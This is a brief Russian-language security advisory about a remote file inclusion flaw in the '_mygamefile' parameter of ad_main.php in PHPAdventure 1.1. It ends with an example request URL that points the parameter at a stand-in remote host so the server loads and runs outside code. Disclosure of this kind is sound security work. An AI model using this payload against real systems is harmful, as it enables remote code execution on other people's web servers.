Программа: PHPAdventure 1.1
Уязвимость позволяет злоумышленнику выполнить произвольный код на целевой системе.
Уязвимость существует из-за ошибки в обработке входных данных в параметре «_mygamefile» сценарием ad_main.php. Атакующий может выполнить произвольный сценарий в контексте безопасности Web сервера.
Пример:
http://vul_site/path/ad_main.php?_mygamefile=http://evilcode.txt?
